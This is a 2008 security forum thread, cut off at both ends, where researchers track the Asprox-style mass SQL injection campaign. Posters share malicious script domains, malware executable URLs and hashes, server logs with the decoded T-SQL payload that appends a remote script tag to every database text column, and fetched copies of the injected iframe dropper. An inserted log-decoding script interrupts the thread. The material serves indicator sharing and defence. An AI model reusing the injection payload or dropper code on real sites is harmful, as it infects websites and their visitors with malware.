document.write ('<script>var a6222tf="51la";var a6222pu="";var a6222pf="51la";var a6222su=window.location;var a6222sf=document.referrer;var a6222of="";var a6222op="";var a6222ops=1;var a6222ot=1;var a6222d=new Date();var a6222color="";if (navigator.appName=="Netscape"){a6222color=screen.pixelDepth;} else {a6222color=screen.colorDepth;}<\/script><script>a6222tf=top.document.referrer;<\/script><script>a6222pu =window.parent.location;<\/script><script>a6222pf=window.parent.document.referrer;<\/script><script>a6222ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a6222ops=(a6222ops==null)?1: (parseInt(unescape((a6222ops)[2]))+1);var a6222oe =new Date();a6222oe.setTime(a6222oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a6222ops+ ";path=/;expires="+a6222oe.toGMTString();a6222ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a6222ot==null){a6222ot=1;}else{a6222ot=parseInt(unescape((a6222ot)[2])); a6222ot=(a6222ops==1)?(a6222ot+1):(a6222ot);}a6222oe.setTime(a6222oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a6222ot+";path=/;expires="+a6222oe.toGMTString();<\/script><script>a6222of=a6222sf;if(a6222pf!=="51la"){a6222of=a6222pf;}if(a6222tf!=="51la"){a6222of=a6222tf;}a6222op=a6222pu;try{lainframe}catch(e){a6222op=a6222su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2016222&tpages=\'+a6222ops+\'&ttimes=\'+a6222ot+\'&tzone=\'+(0-a6222d.getTimezoneOffset()/60)+\'&tcolor=\'+a6222color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a6222of)+\'&vpage=\'+escape(a6222op)+\'" \/>\');<\/script>');

The link in the above code, www.51.la/?2016222, gives us what looks like an automated registration script
Code: [Select]
  <li><a href="reg.asp">申请</a></li>
  <li><a href="login.asp">登录</a></li>
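An added example (mine, not Orac's) of pulling this kind of entry out of a web-server log automatically: decode the request, find the CAST(0x... AS CHAR) literal, hex-decode it (UTF-16LE when the CAST target is an N-type) and list the script src it injects. The log line below is constructed in the shape of the entry above, with a placeholder client IP, a shortened UPDATE and example.invalid as the script host.

```javascript
"use strict";

// Added example, not Orac's code: find Asprox-style
// "SET @S=CAST(0x... AS CHAR(4000));EXEC(@S)" payloads in web-server log
// lines and decode them down to the injected <script src>. The client IP,
// the shortened UPDATE and the example.invalid host are placeholders.

// SQL Server stores NCHAR/NVARCHAR as UTF-16LE, so a CAST to an N-type means
// the hex literal is UTF-16LE; CHAR/VARCHAR (as in the entry above) is
// single-byte.
function decodeCastPayload(hex, sqlType) {
  const enc = /^N/i.test(sqlType) ? "utf16le" : "latin1";
  return Buffer.from(hex, "hex").toString(enc);
}

// Matches whether or not the %20s have been decoded first.
const CAST_RE =
  /CAST\s*\(\s*0x([0-9a-f]+)(?:\s|%20)+AS(?:\s|%20)+(N?(?:VAR)?CHAR)\s*\(/i;
const SCRIPT_SRC_RE = /<script[^>]*\ssrc\s*=\s*["']?([^"'\s>]+)/gi;

// Combined-log-format line -> { decodedSql, scriptSources }, or null when
// the request carries no such payload.
function analyzeLogLine(line) {
  const req = /"(?:GET|POST)\s+(\S+)\s+HTTP\/[\d.]+"/.exec(line);
  if (!req) return null;
  let target = req[1];
  try { target = decodeURIComponent(target); } catch (e) { /* keep raw */ }
  const m = CAST_RE.exec(target);
  if (!m) return null;
  const decodedSql = decodeCastPayload(m[1], m[2]);
  const sources = new Set();
  let s;
  while ((s = SCRIPT_SRC_RE.exec(decodedSql)) !== null) sources.add(s[1]);
  return { decodedSql, scriptSources: [...sources] };
}

// Constructed sample: a shortened form of the decoded statement above, with
// a placeholder script host, hex-encoded the way the attacker's tool does.
const SAMPLE_SQL =
  "update [News] set [Body]=[Body]+'\"></title><script src=\"http://example.invalid/x.js\"></script><!--' " +
  "where [Body] not like '%\"></title><script src=\"http://example.invalid/x.js\"></script><!--'";
const SAMPLE_LOG =
  '203.0.113.5 - - [17/Jul/2008:08:13:32 +0000] ' +
  '"GET /forums/index.php?act=attach&type=post&id=125;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x' +
  Buffer.from(SAMPLE_SQL, "latin1").toString("hex") +
  '%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"';

console.log(analyzeLogLine(SAMPLE_LOG));
```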
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 17, 2008, 04:22:47 pm
New danmec:
www.adwr.ru
www.bnrc.ru
www.iogp.ru
www.lodse.ru
www.rrcs.ru
www.sdkj.ru
www.sslwer.ru
www.vcre.ru
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 17, 2008, 09:22:50 pm
New danmec:
www.adwbn.ru
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 19, 2008, 05:53:55 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on July 21, 2008, 02:16:47 am
<script src=hxxp://stoe.co.kr/img/btn/1.js></script>

<script src=hxxp://www.attadd.com/ngg.js></script>
<script src=hxxp://www.brcporb.ru/ngg.js></script>
<script src=hxxp://www.gb53.ru/ngg.js></script>
<script src=hxxp://www.korfd.ru/ngg.js></script>
<script src=hxxp://www.h23f.ru/ngg.js></script>
<script src=hxxp://www.lkc2.ru/ngg.js></script>
Title: Re: SQL Injected jscript sites
Post by: Orac on July 21, 2008, 04:54:54 pm
Code: [Select]
<script src="http://1.verynx.cn/w.js"></script>
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on July 21, 2008, 05:11:36 pm
Quote
hxxp://www.jvke.ru/ngg.js
hxxp://www.ecx2.ru/ngg.js
Pointing to:
hxxp://nudk.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.jex5.ru/ngg.js
Pointing to:
hxxp://gb53.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.5kc3.ru/ngg.js
hxxp://www.4cnw.ru/ngg.js
hxxp://www.keje.ru/ngg.js
hxxp://www.d5sg.ru/ngg.js
hxxp://www.90mc.ru/ngg.js
Pointing to:
hxxp://4cnw.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.btoperc.ru/ngg.js
hxxp://www.grtsel.ru/ngg.js
Pointing to:
hxxp://h23f.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.o1o2qq.cn/ri.js
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on July 22, 2008, 01:10:32 pm
Quote
hxxp://www.keec.ru/ngg.js
Pointing to:
hxxp://keje.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.9jsr.ru/ngg.js
Pointing to:
hxxp://5kc3.ru/cgi-bin/index.cgi?ad

Title: Re: SQL Injected jscript sites
Post by: JohnC on July 22, 2008, 03:10:52 pm
Thank you.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on July 24, 2008, 02:43:17 pm
<script src=hxxp://www.4vrs.ru/ngg.js></script>
<script src=hxxp://www.bts5.ru/ngg.js></script>
<script src=hxxp://www.cgt4.ru/ngg.js></script>
<script src=hxxp://www.chds.ru/ngg.js></script>
<script src=hxxp://www.cvsr.ru/ngg.js></script>
<script src=hxxp://www.kgj3.ru/ngg.js></script>
<script src=hxxp://www.lksr.ru/ngg.js></script>
<script src=hxxp://abc.verynx.cn/w.js></script>
Title: Re: SQL Injected jscript sites
Post by: Orac on July 24, 2008, 03:35:02 pm
Code: [Select]
<script src="http://abc.verynx.cn/w.js">
<script src="http://1.verynx.cn/w.js">
<script src="http://xunlei.verynx.cn/w.js">

Title: Re: SQL Injected jscript sites
Post by: JohnC on July 26, 2008, 05:45:28 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on August 06, 2008, 06:56:36 pm
Quote
hxxp://jjmaobuduo.3322.org/csrss/w.js
hxxp://jjmaoduo.3322.org/csrss/w.js
hxxp://www.8hcs.ru/js.js
hxxp://www.98hs.ru/js.js
hxxp://www.bgsr.ru/js.js
hxxp://www.bywd.ru/js.js
hxxp://www.ibse.ru/js.js
hxxp://www.ncbw.ru/js.js
hxxp://www.nwj4.ru/js.js
hxxp://www.ojns.ru/js.js
hxxp://www.porv.ru/js.js
hxxp://www.uhwc.ru/js.js

"Main" malware executable that gets dropped from some of the above...
(MD5 -> 68ba2b52c10841ea3d3e5d0982f647d8):
Quote
hxxp://www.plgou.com/csrss/rondll32.exe
And also...
Quote
hxxp://91.203.93.4/cgi-bin/index.cgi?ad
Title: Re: SQL Injected jscript sites
Post by: Serg on August 06, 2008, 11:06:15 pm
===
"Main" malware executable that gets dropped from some of the above...
(MD5 -> 68ba2b52c10841ea3d3e5d0982f647d8):
===

fukc... what is it? I've never seen that. Chinese baidu.com, .ru sites and rootkits + unreachable admin page on 246.114.180.29:7854....
pls add this admin page
Code: [Select]
http://www.plgou.com/csrss/ack.html
and trojans from that
Code: [Select]
http://www.plgou.com/comine/sss.exe
http://www.plgou.com/comine/beauty.exe
http://www.plgou.com/comine/sl.exe
http://www.plgou.com/comine/server.exe
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on August 06, 2008, 11:34:12 pm
Regarding the dropped rondll32.exe above...
http://s3cwatch.wordpress.com/2008/08/06/

Didn't really bother digging more into the dropped exes to be honest,
spent more time trying to dig up newer "injection" domains per se...

Edit: Thought I should add the hashes from the rest of the .exes as well...
Quote
846790691B6F9717B9A1BF68E0BCD6E5 -> sss.exe
C1D6F2020EA16FA73CF70F522A7ECFD6 -> beauty.exe
82686A1AB42882AE0E40B863E79E6E33  -> sl.exe
526FEEE3909E18DB7D8AA567019B7C2C -> server.exe
Title: Re: SQL Injected jscript sites
Post by: Orac on August 07, 2008, 11:11:54 am
One from today's logs on one of our servers

Log entry, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST(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 AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

Decoded, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

The link is returning a 500 Internal server error.

In all we have seen this same SQL injection attempt from 35 individual IPs today.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on August 07, 2008, 02:18:45 pm
also downloaded.

Quote
hxxp://www.plgou.com/comine/new2.exe
hxxp://www.plgou.com/comine/b.exe
Title: Re: SQL Injected jscript sites
Post by: Serg on August 07, 2008, 06:35:00 pm
Quote
One from today's logs on one of our servers
[...]
In all we have seen this same SQL injection attempt from 35 individual IPs today.
Try Google to count infected forum posts...
Title: Re: SQL Injected jscript sites
Post by: Orac on August 09, 2008, 10:38:21 am
Log entry, with IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [09/Aug/2008:03:11:39 +0000] "GET /rrpad/pad.xml?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"

decoded
Code: [Select]
xxx.xxx.xxx.xxx - - [09/Aug/2008:03:11:39  0000] "GET /rrpad/pad.xml?';DECLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"

Code: [Select]
--11:24:09--  http://sdo.1000mg.cn/csrss/w.js
           => `w.js'
Resolving sdo.1000mg.cn... 121.11.76.85
Connecting to sdo.1000mg.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
window.onerror=function(){return true;}
if(typeof(js86eus)=="undefined")
{
var js86eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=100 height=0 src=http://www.plgou.com/csrss/new.htm></iframe>");

}else{
document.write("<iframe  width=100 height=0 src=http://www.plgou.com/kk/kk.htm></iframe>");
}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

The iframe link to count41.51yes.com returns a 500 Internal Server Error; both iframe links to plgou.com are active.

In all we saw this script from 236 individual IPs today.
Title: Re: SQL Injected jscript sites
Post by: Kayrac on August 09, 2008, 10:44:05 am
Code: [Select]
http://www.plgou.com/kk/rondll32.exe#version=1,0,0,1
for a direct link to the file; gonna run it in a sec when I get VMware back up and running

-Brian

different file here also
Code: [Select]
http://www.plgou.com/csrss/rondll32.exe
Title: Re: SQL Injected jscript sites
Post by: Kayrac on August 09, 2008, 01:06:15 pm
OK, the kk rondll file drops 2 files in the Windows font folders


the other one (the csrss one) downloads these two
Code: [Select]
http://www.plgou.com/comine/sl.exe

http://www.plgou.com/comine/server.exe
more to come!

Code: [Select]
http://www.plgou.com/csrss/index.html
which lists
Code: [Select]
2008-08-08 http://www.plgou.com/comine/sss.exe
2008-08-08 http://www.plgou.com/comine/sl.exe
2008-08-08 http://www.plgou.com/comine/server.exe

sl.exe won't run on Vista, stupid Vista :(

-Brian
Title: Re: SQL Injected jscript sites
Post by: JohnC on August 12, 2008, 08:20:05 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on August 15, 2008, 02:48:13 pm
Quote
hxxp://a.mm861.com/1.js
   <_SCRIPT src="hxxp://a.mm861.com/1.js"></_SCRIPT>
   <_IFRAME src="hxxp://www.6980982jh.com/tt1.html" width=0 height=0></_IFRAME>
   <_IFRAME src="hxxp://www.mydearsister.net/css/ad.htm" width=50 height=0></_IFRAME>
   <_IFRAME src="hxxp://www.80man.com.cn/index.htm" width=0 height=0></_IFRAME>

Thank you Malzilla
Title: Re: SQL Injected jscript sites
Post by: Kayrac on August 15, 2008, 04:41:27 pm
from that js file above

Code: [Select]
51js.th-club.com/1794424.js
51js.th-club.com/2039774.js
51js.th-club.com/2068633.js
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2039774&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.mydearsister.net/css/ad.htm
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2068633&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.80man.com.cn/index.htm
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=31&id=1794424&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.6980982jh.com/tt1.html
count14.51yes.com/click.aspx?id=146836447&logo=1
count14.51yes.com/count1.gif
count14.51yes.com/sa.aspx?id=146836447&refe=http%3A//www.6980982jh.com/tt1.html&location=http%3A//www.rigoogle.com/&color=32x&resolution=1076x873&returning=0&language=en-us&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%205.1%29
count4.51yes.com/click.aspx?id=48870943&logo=1
count4.51yes.com/count1.gif
count4.51yes.com/sa.aspx?id=48870943&refe=&location=http%3A//www.6980982jh.com/tt1.html&color=32x&resolution=1076x873&returning=0&language=en-us&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%205.1%29
icon.ajiang.net/icon_0.gif
www.6980982jh.com/favicon.ico
www.6980982jh.com/tt1.html
www.80man.com.cn/14.htm
www.80man.com.cn/4561.swf
www.80man.com.cn/WIN%209,0,47,0i.swf
www.80man.com.cn/css/css.exe
www.80man.com.cn/favicon.ico
www.80man.com.cn/flash.htm
www.80man.com.cn/index.htm
www.80man.com.cn/kkk.exe
www.80man.com.cn/office.htm
www.80man.com.cn/re10.htm
www.80man.com.cn/re11.htm
www.mydearsister.net/css/ad.htm
www.mydearsister.net/css/dadongi.asp?dadong=WIN%209,0,47,0
www.mydearsister.net/css/dadongi.swf
www.mydearsister.net/css/dd.exe
www.mydearsister.net/css/dx.exe
www.mydearsister.net/css/index.htm
www.mydearsister.net/css/kr.exe
www.mydearsister.net/css/list.txt
www.mydearsister.net/css/list.txt
www.mydearsister.net/css/mx.exe
www.mydearsister.net/css/ress.htm
www.mydearsister.net/favicon.ico
www.mydearsister.net/u.exe
www.mydearsister.netPOST/Count/Count.asp(application/x-www-form-urlencoded)
www.rigoogle.com/
www.rigoogle.com/flash.htm
www.rigoogle.com/help.exe
www.rigoogle.com/i47.swf
www.rigoogle.com/issf.html
www.rigoogle.com/office.htm
www.rigoogle.com/re10.htm
www.rigoogle.com/swfobject.js
 
Title: Re: SQL Injected jscript sites
Post by: JohnC on August 16, 2008, 09:31:51 am
Thank you.
Title: Re: SQL Injected jscript sites
Post by: Orac on August 16, 2008, 10:54:45 am
Sample log out of a total of 398 separate injection attempts involving the same script within the last 24 hours; IP address obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx - - [16/Aug/2008:03:00:47 +0000] "GET /forums/index.php?act=findpost&pid=14367';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwarebytes.org) "-"

Decoded, IP address obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx - - [16/Aug/2008:03:00:47  0000] "GET /forums/index.php?act=findpost&pid=14367';DeCLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www3.800mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www3.800mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));ExEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwarebytes.org) "-"


Code: [Select]
--11:18:59--  http://www3.800mg.cn/csrss/w.js
           => `w.js'
Resolving www3.800mg.cn... 121.11.76.85
Connecting to www3.800mg.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

SQL injection script
Code: [Select]
window.onerror=function(){return true;}
if(typeof(js8eus)=="undefined")
{
var js8eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=100 height=1 src=http://www3.800mg.cn/csrss/new.htm></iframe>");

}else{

}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}



Second iframe link
Code: [Select]
--11:21:14--  http://www3.800mg.cn/csrss/new.htm
           => `new.htm'
Resolving www3.800mg.cn... 121.11.76.85
Connecting to www3.800mg.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://js.users.51.la/2063988.js"></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src='http://s135.cnzz.com/stat.php?id=1005288&web_id=1005288' language='javaScript' charset='gb2312'></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>


First iframe link
Code: [Select]
--11:24:21--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
<html>
    <head>
        <title>Runtime Error</title>
        <style>
        body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
        p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
        b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
        H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
        H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
        pre {font-family:"Lucida Console";font-size: .9em}
        .marker {font-weight: bold; color: black;text-decoration: none;}
        .version {color: gray;}
        .error {margin-bottom: 10px;}
        .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
        </style>
    </head>

    <body bgcolor="white">

            <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

            <h2> <i>Runtime Error</i> </h2></span>

            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

            <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
            <br><br>

            <b>Details:</b> To enable the details of this specific error message to be viewable on remote machines, please create a &lt;customErrors&gt; tag within a "web.config" configuration file located in the root directory of the current web application. This &lt;customErrors&gt; tag should then have its "mode" attribute set to "Off".<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config Configuration File --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;Off&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

            <b>Notes:</b> The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's &lt;customErrors&gt; configuration tag to point to a custom error page URL.<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config Configuration File --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

    </body>
</html>



Secondary iframe
Code: [Select]
--11:29:33--  http://js.users.51.la/2063988.js
           => `2063988.js'
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2063988" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a3988tf="51la";var a3988pu="";var a3988pf="51la";var a3988su=window.location;var a3988sf=document.referrer;var a3988of="";var a3988op="";var a3988ops=1;var a3988ot=1;var a3988d=new Date();var a3988color="";if (navigator.appName=="Netscape"){a3988color=screen.pixelDepth;} else {a3988color=screen.colorDepth;}<\/script><script>a3988tf=top.document.referrer;<\/script><script>a3988pu =window.parent.location;<\/script><script>a3988pf=window.parent.document.referrer;<\/script><script>a3988ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3988ops=(a3988ops==null)?1: (parseInt(unescape((a3988ops)[2]))+1);var a3988oe =new Date();a3988oe.setTime(a3988oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3988ops+ ";path=/;expires="+a3988oe.toGMTString();a3988ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3988ot==null){a3988ot=1;}else{a3988ot=parseInt(unescape((a3988ot)[2])); 